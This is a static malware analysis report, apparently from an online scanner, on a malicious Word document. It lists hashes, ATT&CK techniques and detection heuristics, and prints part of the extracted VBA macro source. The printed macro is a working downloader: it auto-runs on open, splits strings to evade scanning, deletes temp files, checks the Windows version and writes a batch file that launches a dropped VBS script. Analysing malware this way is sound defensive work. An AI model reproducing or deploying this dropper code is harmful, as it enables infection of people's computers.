Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8b92c23b29422131…

MALICIOUS

Office (OLE)

62.5 KB Created: 2015-02-08 19:56:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: a3b613d128aace09241504e8acc678c2 SHA-1: edde71ccadfad1380b881da5ecafc77fba5885b8 SHA-256: 8b92c23b29422131acc150fa1ebac67e1b0b0f8cfc1b727805b842a88de447de
430 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains multiple VBA auto-execution macros (AutoOpen, Workbook_Open, Auto_Open) that trigger the execution of a malicious script. This script utilizes the 'WScript.Shell' object, reassembled from split string literals, to construct paths for temporary files and likely download and execute a second-stage payload. The presence of 'Shell()' and 'GetObject()' calls further indicates malicious intent to execute external code.

Heuristics 12

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15446 bytes
SHA-256: 4efb6e24b820e59e29788226f82e43e5a227bbcc68b813740771e21fdbdb739c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    h
End Sub
Sub h()
Dim MY_FILENDIR, ASDASDSA, MY_FILDIR, XPFILEDIR, JAISODJAS
     ds = 100
     USER = Environ$("" & Chr(Asc(Chr(ds + 17))) + "s" & "er" & "na" & "me")
     
     jks = ds
         
     PST2 = "" & "a" + "do" & "be" & "ac" & "d-u" & "pd" & "a" & "te" & ""
     VBT2 = "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te" & ""
     VBTXP2 = "" & "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p" & ""
     BART2 = "" & "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date" & ""
    
     PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
     VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
     VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
     BART = BART2 + Chr(Abs(46)) + Chr(Abs(98)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""
     
     JSIQOJQ = BART2 + Chr(Abs(ds - 100 - 46)) + Chr(Abs(ds - 100 - 98)) + Chr(Asc(Chr(Abs(ds / 2 + 47)))) + Chr(Asc(Chr(ds + Fix(16.2)))) + "" & ""
          
     BART = JSIQOJQ
     MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1 + "" & ""
    
     ASDASDSA = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
     MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + ""
     XPFILEDIR = "c:\Windows\Temp\" + VBTXP
     TRT = "c:\Windows\Temp\" + BART
     KRT = TRT
     HYF = KRT
     NUWHDGJS = HYF
     JASHDUIQWHDKJQAD = ".44/upd/install"
     
      On Error Resume Next
     SetAttr MY_FILENDIR, vbNormal
     
     If (Len(Dir(MY_FILENDIR)) <> 0) Then
      Kill MY_FILENDIR
     End If
     
     On Error Resume Next
     SetAttr ASDASDSA, vbNormal
     If (Dir(ASDASDSA) <> "") Then
      Kill ASDASDSA
     End If
     
     On Error Resume Next
     SetAttr MY_FILDIR, vbNormal
     If (Dir(MY_FILDIR) <> "") Then
      Kill MY_FILDIR
     End If
     
     On Error Resume Next
     SetAttr XPFILEDIR, vbNormal
     If (Dir(XPFILEDIR) <> "") Then
      Kill XPFILEDIR
     End If
      
     Dim Uuwqdhj, FileNumber, FileNumb, FileNu, FileNuG, FileNs, mttt, jskw As Integer
    
     Dim retVal As Variant
     
     FileNumber = FreeFile
     FileNumb = FreeFile
     FileNu = FreeFile
     FileNukk = FreeFile
     
     FileNs = FreeFile
     Kasdwq = FreeFile
     FileNuG = FreeFile
     Dim objWMIService As Variant
    Dim colOperatingSystems As Variant
    Dim objOperatingSystem As Variant
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
    Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
    For Each objOperatingSystem In colOperatingSystems
        SysReport = SysReport & "The operating system on this computer is " & _
            objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
    Next
     
     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
     For Each objOperatingSystem In colOperatingSystems
        winverstr = objOperatingSystem.Version
    Next
    
    
    winver = Val(winverstr)
    WaitFor (1)
    jskw = winver
 
 If (jskw <= 5.5) Then
          
     Open NUWHDGJS For Output As #Kasdwq
     Print #Kasdwq, "@echo off"
     Print #Kasdwq, ":pinkator"
     Print #Kasdwq, "pin" + "g 1.3.1.2 -n" & " 2" + ""
     LKASHDUIQWHQUDKNBWQKJDHQ = "sakdj lksajds" + "sakdj sakjd sakhd jhqwiudhquid gughg"
     Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
     Print #Kas
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.